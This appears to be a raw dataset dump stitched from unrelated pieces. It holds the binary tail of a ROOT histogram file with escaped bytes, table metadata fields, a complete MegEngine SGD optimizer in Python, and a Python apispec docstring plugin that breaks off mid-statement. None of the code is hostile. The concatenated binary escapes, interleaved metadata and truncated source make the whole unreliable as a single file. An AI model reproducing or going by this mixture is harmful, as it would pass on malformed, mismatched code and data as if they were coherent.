points\x00\x00\x000\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07double*\x00\x00\x00\x04\x08fNpoints\x06TGraph@\x00\x00\x80\x80\x00\x17\xd0@\x00\x00x\x00\x02@\x00\x00^\x00\x04@\x00\x00,\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x02fY\x1c[fNpoints] array of Y points\x00\x00\x000\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07double*\x00\x00\x00\x04\x08fNpoints\x06TGraph@\x00\x00\x83\x80\x00\x16\xcb@\x00\x00{\x00\x02@\x00\x00u\x00\x04@\x00\x00D\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfFunctions,Pointer to list of functions (fits and user)\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\x80\x80\x00\x16\xcb@\x00\x00x\x00\x02@\x00\x00r\x00\x04@\x00\x00B\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfHistogram*Pointer to histogram used for drawing axis\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05TH1F*@\x00\x00w\x80\x00\x02\x08@\x00\x00o\x00\x02@\x00\x00i\x00\x04@\x00\x008\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum"Minimum value for plotting along y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00w\x80\x00\x02\x08@\x00\x00o\x00\x02@\x00\x00i\x00\x04@\x00\x008\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum"Maximum value for plotting along y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x01"\x80\x00\x00[@\x00\x01\x1a\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH1F\x00\xe2\x93\x96D\x00\x00\x00\x02@\x00\x00\xf6\x80\x00\x00\x9b@\x00\x00\xee\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH1\x1a1-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c7@\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x08@\x00\x00e\x80\x00\x00\xc6@\x00\x00]\x00\x03@\x00\x00S\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayF\x0fArray of floats\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Z\x0b\xf6\xf1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01:\x80\x00\x00[@\x00\x012\x00\t@\x00\x00\x15\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x07TArrayF\x00Z\x0b\xf6\xf1\x00\x00\x00\x01@\x00\x01\x0b\x80\x00\x00\x9b@\x00\x01\x03\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00n\x80\x00\x00\xc6@\x00\x00f\x00\x03@\x00\x00\\\x00\x04@\x00\x00-\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TArray\x19Abstract array base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00p!\xb2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00x\x80\x00\x17\xd0@\x00\x00p\x00\x02@\x00\x00\\\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fArray\x17[fN] Array of fN floats\x00\x00\x00-\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06float*\x00\x00\x00\x01\x02fN\x06TArray\x00@\x00\x03F\x80\x00\x00[@\x00\x03>\x00\t@\x00\x00\x19\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x0bTMultiGraph\x00\xe0\x89<\xd5\x00\x00\x00\x02@\x00\x03\x13\x80\x00\x00\x9b@\x00\x03\x0b\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00@\x00\x00\x7f\x80\x00\x00\xc6@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00n\x80\x00\x16\xcb@\x00\x00f\x00\x02@\x00\x00`\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fGraphs\x1aPointer to list of TGraphs\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\x83\x80\x00\x16\xcb@\x00\x00{\x00\x02@\x00\x00u\x00\x04@\x00\x00D\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfFunctions,Pointer to list of functions (fits and user)\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06TList*@\x00\x00\x80\x80\x00\x16\xcb@\x00\x00x\x00\x02@\x00\x00r\x00\x04@\x00\x00B\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfHistogram*Pointer to histogram used for drawing axis\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05TH1F*@\x00\x00w\x80\x00\x02\x08@\x00\x00o\x00\x02@\x00\x00i\x00\x04@\x00\x008\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMaximum"Maximum value for plotting along y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00w\x80\x00\x02\x08@\x00\x00o\x00\x02@\x00\x00i\x00\x04@\x00\x008\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fMinimum"Minimum value for plotting along y\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double\x00@\x00\x01!\x80\x00\x00[@\x00\x01\x19\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH1C\x006\xf6\xe4\xad\x00\x00\x00\x02@\x00\x00\xf5\x80\x00\x00\x9b@\x00\x00\xed\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH1\x1a1-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c7@\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x08@\x00\x00d\x80\x00\x00\xc6@\x00\x00\\\x00\x03@\x00\x00R\x00\x04@\x00\x00#\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayC\x0eArray of chars\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xae\x87\x996\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01 \x80\x00\x00[@\x00\x01\x18\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH1I\x00bud\xf6\x00\x00\x00\x02@\x00\x00\xf4\x80\x00\x00\x9b@\x00\x00\xec\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH1\x1a1-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c7@\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x08@\x00\x00c\x80\x00\x00\xc6@\x00\x00[\x00\x03@\x00\x00Q\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayI\rArray of ints\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\xd5q\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01"\x80\x00\x00[@\x00\x01\x1a\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH1S\x00\x8cM\x9d\xcb\x00\x00\x00\x02@\x00\x00\xf6\x80\x00\x00\x9b@\x00\x00\xee\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH1\x1a1-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c7@\xc4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x08@\x00\x00e\x80\x00\x00\xc6@\x00\x00]\x00\x03@\x00\x00S\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayS\x0fArray of shorts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\\\x93\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01!\x80\x00\x00[@\x00\x01\x19\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH2C\x00\xbd\x00\x10\xfe\x00\x00\x00\x03@\x00\x00\xf5\x80\x00\x00\x9b@\x00\x00\xed\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH2\x1a2-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x824\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x04@\x00\x00d\x80\x00\x00\xc6@\x00\x00\\\x00\x03@\x00\x00R\x00\x04@\x00\x00#\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayC\x0eArray of chars\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xae\x87\x996\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01"\x80\x00\x00[@\x00\x01\x1a\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH2S\x00\x12V\xca\x1c\x00\x00\x00\x03@\x00\x00\xf6\x80\x00\x00\x9b@\x00\x00\xee\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH2\x1a2-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x824\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x04@\x00\x00e\x80\x00\x00\xc6@\x00\x00]\x00\x03@\x00\x00S\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayS\x0fArray of shorts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\\\x93\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01 \x80\x00\x00[@\x00\x01\x18\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH2I\x00\xe8~\x91G\x00\x00\x00\x03@\x00\x00\xf4\x80\x00\x00\x9b@\x00\x00\xec\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH2\x1a2-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x824\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x04@\x00\x00c\x80\x00\x00\xc6@\x00\x00[\x00\x03@\x00\x00Q\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayI\rArray of ints\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\xd5q\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01"\x80\x00\x00[@\x00\x01\x1a\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH2F\x00h\x9c\xc2\x95\x00\x00\x00\x03@\x00\x00\xf6\x80\x00\x00\x9b@\x00\x00\xee\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH2\x1a2-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x824\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x04@\x00\x00e\x80\x00\x00\xc6@\x00\x00]\x00\x03@\x00\x00S\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayF\x0fArray of floats\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Z\x0b\xf6\xf1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01!\x80\x00\x00[@\x00\x01\x19\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH3C\x00\xa1\xff\x8d\x94\x00\x00\x00\x03@\x00\x00\xf5\x80\x00\x00\x9b@\x00\x00\xed\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH3\x1a3-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\xd2D_\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x05@\x00\x00d\x80\x00\x00\xc6@\x00\x00\\\x00\x03@\x00\x00R\x00\x04@\x00\x00#\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayC\x0eArray of chars\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xae\x87\x996\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01"\x80\x00\x00[@\x00\x01\x1a\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH3S\x00\xf7VF\xb2\x00\x00\x00\x03@\x00\x00\xf6\x80\x00\x00\x9b@\x00\x00\xee\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH3\x1a3-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\xd2D_\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x05@\x00\x00e\x80\x00\x00\xc6@\x00\x00]\x00\x03@\x00\x00S\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayS\x0fArray of shorts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\\\x93\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01 \x80\x00\x00[@\x00\x01\x18\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH3I\x00\xcd~\r\xdd\x00\x00\x00\x03@\x00\x00\xf4\x80\x00\x00\x9b@\x00\x00\xec\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH3\x1a3-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\xd2D_\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x05@\x00\x00c\x80\x00\x00\xc6@\x00\x00[\x00\x03@\x00\x00Q\x00\x04@\x00\x00"\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayI\rArray of ints\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\xd5q\xc7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x01"\x80\x00\x00[@\x00\x01\x1a\x00\t@\x00\x00\x12\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x04TH3F\x00M\x9c?+\x00\x00\x00\x03@\x00\x00\xf6\x80\x00\x00\x9b@\x00\x00\xee\x00\x03\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00l\x80\x00\x00\xc6@\x00\x00d\x00\x03@\x00\x00Z\x00\x04@\x00\x00+\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x03TH3\x1a3-Dim histogram base class\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00B\xd2D_\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x05@\x00\x00e\x80\x00\x00\xc6@\x00\x00]\x00\x03@\x00\x00S\x00\x04@\x00\x00$\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TArrayF\x0fArray of floats\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00Z\x0b\xf6\xf1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01\x00@\x00\x03a\xff\xff\xff\xffTList\x00@\x00\x03S\x00\x05\x00\x01\x00\x00\x00\x00\x02\x00@\x00\x0blistOfRules\x00\x00\x00\x05@\x00\x00\xa3\xff\xff\xff\xffTObjString\x00@\x00\x00\x90\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x83type=read sourceClass="TProfile" targetClass="TProfile" version="[1-5]" source="" target="fBinSumw2" code="{ fBinSumw2.Reset(); }" \x00@\x00\x00\x9c\x80\x00\x9ds@\x00\x00\x94\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x87type=read sourceClass="TProfile2D" targetClass="TProfile2D" version="[1-6]" source="" target="fBinSumw2" code="{ fBinSumw2.Reset(); }" \x00@\x00\x00\x9c\x80\x00\x9ds@\x00\x00\x94\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x87type=read sourceClass="TProfile3D" targetClass="TProfile3D" version="[1-6]" source="" target="fBinSumw2" code="{ fBinSumw2.Reset(); }" \x00@\x00\x00\xab\x80\x00\x9ds@\x00\x00\xa3\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x96type=read sourceClass="TTree" targetClass="TTree" version="[-16]" source="" target="fDefaultEntryOffsetLen" code="{ fDefaultEntryOffsetLen = 1000; }" \x00@\x00\x00\x98\x80\x00\x9ds@\x00\x00\x90\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x83type=read sourceClass="TTree" targetClass="TTree" version="[-18]" source="" target="fNClusterRange" code="{ fNClusterRange = 0; }" \x00\x00\x00'
| 3,301.714286
| 112,866
| 0.753496
|
183820dab2ad545bf5eb8fa9a33051bfb4c7bde0
| 3,384
|
py
|
Python
|
basecls/solver/optimizer/sgd.py
|
megvii-research/basecls
|
6b395a0a888370b4523764afb78a5a7634a3f6cd
|
[
"Apache-2.0"
] | 23
|
2021-12-08T02:35:01.000Z
|
2022-03-16T02:23:19.000Z
|
basecls/solver/optimizer/sgd.py
|
megvii-research/basecls
|
6b395a0a888370b4523764afb78a5a7634a3f6cd
|
[
"Apache-2.0"
] | 4
|
2021-12-23T11:31:17.000Z
|
2022-02-28T01:35:31.000Z
|
basecls/solver/optimizer/sgd.py
|
megvii-research/basecls
|
6b395a0a888370b4523764afb78a5a7634a3f6cd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
import os
from typing import Iterable, Union
from megengine import Parameter, tensor
from megengine.functional.inplace import _inplace_add_
from megengine.optimizer import Optimizer
class SGD(Optimizer):
r"""Implements stochastic gradient descent.
Nesterov momentum is based on the formula from
`"On the importance of initialization and momentum in deep learning"
<http://www.cs.toronto.edu/%7Ehinton/absps/momentum.pdf>`_.
Args:
params: iterable of parameters to optimize or dicts defining parameter groups.
lr: learning rate.
momentum: momentum factor. Default: ``0.0``
nesterov: enables Nesterov momentum. Default: ``False``
weight_decay: weight decay (L2 penalty). Default: ``0.0``
"""
def __init__(
self,
params: Union[Iterable[Parameter], dict],
lr: float,
momentum: float = 0.0,
nesterov: bool = False,
weight_decay: float = 0.0,
):
if lr < 0.0:
raise ValueError("Invalid learning rate: {}".format(lr))
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if nesterov and momentum <= 0:
raise ValueError("Nesterov momentum requires a momentum")
defaults = dict(lr=lr, momentum=momentum, weight_decay=weight_decay)
super().__init__(params, defaults)
self.nesterov = nesterov
self._disable_type_convert = True
def _create_state(self, param_group):
if param_group["momentum"] != 0.0:
for param in param_group["params"]:
self._add_state(param, "momentum_buffer")
def _updates(self, param_group):
lr = param_group["lr"]
weight_decay = param_group["weight_decay"]
momentum = param_group["momentum"]
# since `conver_inputs` is disabled for param updates,
# scalar should be explicitly tansforred to tensor
_lr = tensor(lr)
_weight_decay = tensor(weight_decay)
_momentum = tensor(momentum)
inplace_mode = int(os.getenv("MEGENGINE_INPLACE_UPDATE", "0"))
if inplace_mode:
_neg_lr = tensor(-lr)
c1 = tensor([1.0])
for param in param_group["params"]:
if param.grad is None:
continue
grad = param.grad
if weight_decay != 0.0:
grad = grad + param * _weight_decay
if inplace_mode:
if momentum != 0.0:
v = self._state[param]["momentum_buffer"]
_inplace_add_(v, grad, alpha=_momentum, beta=c1)
if self.nesterov:
grad = grad + v * _momentum
else:
grad = v
_inplace_add_(param, grad, alpha=c1, beta=_neg_lr)
continue
if momentum != 0.0:
v = self._state[param]["momentum_buffer"]
v *= _momentum
v += grad
if self.nesterov:
grad = grad + v * _momentum
else:
grad = v
param -= _lr * grad
| 34.530612
| 86
| 0.577423
|
5add3cdbc9a8f36b3ef4743317dd198ed05cf5a5
| 8,552
|
py
|
Python
|
registry/http/spec/plugins/docstring.py
|
rmb938/tf-registry
|
bce809ae52e65549b05b836d3f70e8a1de2f2cec
|
[
"MIT"
] | 3
|
2019-02-25T05:15:39.000Z
|
2020-11-26T02:56:10.000Z
|
registry/http/spec/plugins/docstring.py
|
rmb938/tf-registry
|
bce809ae52e65549b05b836d3f70e8a1de2f2cec
|
[
"MIT"
] | null | null | null |
registry/http/spec/plugins/docstring.py
|
rmb938/tf-registry
|
bce809ae52e65549b05b836d3f70e8a1de2f2cec
|
[
"MIT"
] | null | null | null |
from apispec import BasePlugin
from apispec.exceptions import DuplicateComponentNameError
from apispec.yaml_utils import load_operations_from_docstring
from schematics.contrib.enum_type import EnumType
from schematics.models import FieldDescriptor
from schematics.types import ModelType, DictType, ListType, BooleanType, EmailType, UUIDType, StringType, IntType
from schematics.undefined import UndefinedType
from registry.http.schematics.types import ArrowType, NameType
class DocStringPlugin(BasePlugin):
def __init__(self):
self.spec = None
def init_spec(self, spec):
super().init_spec(spec)
self.spec = spec
def operation_helper(self, path, operations, router, func, **kwargs):
new_operations = load_operations_from_docstring(func.__doc__)
if hasattr(func, '_cp_config') is False:
return None
cp_config = func._cp_config
if new_operations is not None:
for method, data in new_operations.items():
if cp_config.get('tools.authentication.on', True):
data['security'] = [
{'Bearer': []}
]
if 'tools.model_in.cls' in cp_config:
model_cls = cp_config['tools.model_in.cls']
try:
self.spec.components.schema(model_cls.__name__, component=parse_model(self.spec, model_cls))
